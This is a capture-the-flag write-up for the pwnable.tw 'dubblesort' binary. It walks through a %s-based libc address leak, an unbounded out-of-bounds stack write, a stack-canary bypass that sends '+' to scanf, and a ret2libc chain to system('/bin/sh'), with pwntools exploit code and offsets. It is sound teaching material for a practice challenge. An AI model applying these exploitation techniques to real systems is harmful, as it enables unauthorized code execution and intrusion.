This challenge leverages the behavior of the %s format specifier, which prints characters until it encounters a null terminator (\x00). By exploiting this property, it is possible to leak information about the libc base address. Additionally, the program contains an out-of-bounds (OOB) write operation; however, the writes are automatically sorted in ascending order.
Initial Analysis
File Analysis
file dubblesort
dubblesort: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter ./ld-2.23.so, for GNU/Linux 2.6.24, BuildID[sha1](/images/pwnabletw-dubblesort/)=12a217baf7cbdf2bb5c344ff14adcf7703672fb1, stripped
file libc_32.so.6
libc_32.so.6: ELF 32-bit LSB shared object, Intel 80386, version 1 (GNU/Linux), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1](/images/pwnabletw-dubblesort/)=d26149b8dc15c0c3ea8a5316583757f69b39e037, for GNU/Linux 2.6.32, stripped
checksec --file ./dubblesort
[*](/images/pwnabletw-dubblesort/) '/home/capang/Desktop/CTF/pwnable.tw/dubblesort/dubblesort'
Arch: i386-32-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
RUNPATH: b'.'
FORTIFY: Enabled
Key Findings:-
- The ELF is 32-bit/x86
- The ELF is stripped
- All standard security mitigations (Full RELRO, Stack Canary, NX, PIE, and FORTIFY) are enabled.
Initial Testing
When starting the program, it first prompts for your name:
After entering your name, you’ll notice some extraneous bytes printed afterward. This hints at an exploitable behavior in the %s format specifier. Next, the program asks for the number of numbers you wish to sort before performing the sort:
Analysis in Ghidra
Analyzing the binary in Ghidra reveals the following:
From the code snippet, we can see that the program prints the name using %s. Then it asks for the number of numbers to sort. Critically, there is no validation on the maximum number of numbers to be sorted, which introduces an opportunity for an OOB write.
Analysis in GDB
Validating Information Leakage
By loading the binary into GDB and setting a breakpoint at main+85 (before the name input), we can inspect the stack. For example:
The stack havent been zero’ed out making the %s
format able to leak out information. Giving an input ‘a’ will make the stack look like this
This indicates that various addresses on the stack (within the space allocated for the name) can be leaked.
Validating OOB Write
By providing a large number of numbers to sort, the program triggers stack smashing:
This confirms that an OOB write is occurring, which enables us to build a ROP chain.
Key Takeways
- The name input can leak information.
- The leaked information includes a libc address.
- The offsets for the stack canary and the return address can be determined.
- With a crafted ROP chain, it is possible to redirect execution to libc’s
system
function and spawn a shell.
Information Gathering
Gaining Libc Base Address
Inspecting the stack before the name input shows that we can estimate the number of bytes needed and the values that will be leaked:
At the start of the stack, there is an address corresponding to libc_base + 0xe50d7, and at the fourth word, an address corresponding to libc_base + 0x8f82f. To obtain the libc base address, we can provide 16 characters. The following newline (\n) will fill in the least significant byte of the address. We then extract the first 3 bytes that have been leaked and append \x00.
The following code snippet shows how to leak and extract the address:
io.sendlineafter(b' :',b'AAAAAAAAAAAAAAAA')
io.recvuntil(b'AAAAAAAAAAAAAAAA\n')
leaked =unpack(io.recv(3).rjust(4,b'\x00'))
info(f'leaked: {hex(leaked)}')
Since the leaked value has an offset of +0x8f800, subtracting this value gives us the libc base address. To locate the addresses of system and /bin/sh, we simply add their offsets (from the libc binary) to the libc base address:
Code:
libc.address = leaked - 0x8f800
bin_sh = libc.address + 0x158e8b
system = libc.address + 0x3a940
info(f'libc base: {hex(libc.address)}')
Finding offset for canary and ret address
By setting a breakpoint after the numbers have been input (e.g., at main+229
), you can observe where the variables are placed in memory:
For the number at offset 0, it is stored at ebp-0x7c
.
The stack canary is located at ebp-0x1c
, and the return address is at ebp+4
.
Thus, the canary is at offset 24, and the return address is at offset 32.
Bypassing the Canary
Although the canary value cannot be directly leaked, our analysis in Ghidra shows that the number inputs are processed using the %d
format. By providing a non-numerical input (e.g., a +
), the scanf
call does not overwrite the canary value. For example:
Providing a numerical input at offset 24:
Providing non-numerical input at offset 24:
This bypasses the stack canary.
Key Takeaways:
- Provide 16 characters as input to leak a libc address.
- The libc address is obtained by subtracting
0x8f800
from the leaked value. - At offset 24, supply non-numerical input (a
+
) to avoid overwriting the canary. - At offset 32, input the address of
system
. - At offset 33, input the address of the
/bin/sh
string.
Exploitation Phase
With all necessary information gathered, we must now consider that the numbers will be sorted in ascending order. For instance:
The address of /bin/sh
is larger than that of system
. This does not affect the alignment for ROPing. However, note that the canary value is random. Although the probability of failure is low, if the canary value is larger than expected, the exploit might not work.
The following diagram summarizes the exploit structure:
Below is the final exploitation code:
io.sendlineafter(b' :',b'36')
sleep(1)
for i in range(24):
io.sendlineafter(b' : ',b'1')
io.sendlineafter(b' : ',b'+')
for i in range(33-25):
io.sendlineafter(b' : ',str(system))
for i in range(3):
io.sendlineafter(b' : ',str(bin_sh))